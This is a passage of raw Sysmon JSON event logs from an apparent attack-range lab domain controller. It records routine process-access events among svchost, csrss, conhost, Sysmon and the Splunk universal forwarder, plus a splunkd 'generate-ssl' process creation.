C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1867,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1868,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1869,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1870,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nTargetProcessId: 3736\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","TargetProcessId":"3736","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1871,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.744\r\nProcessGuid: {A837DB8D-01C7-5F25-0000-0010AABE0300}\r\nProcessId: 2612\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nParentProcessId: 3736\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.744","ProcessGuid":"{A837DB8D-01C7-5F25-0000-0010AABE0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-001075BD0300}","ParentProcessId":"3736","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1872,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nSourceProcessId: 3736\r\nSourceThreadId: 3716\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010AABE0300}\r\nTargetProcessId: 2612\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","SourceProcessId":"3736","SourceThreadId":"3716","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010AABE0300}","TargetProcessId":"2612","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1873,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010AABE0300}\r\nTargetProcessId: 2612\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010AABE0300}","TargetProcessId":"2612","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1874,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1875,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 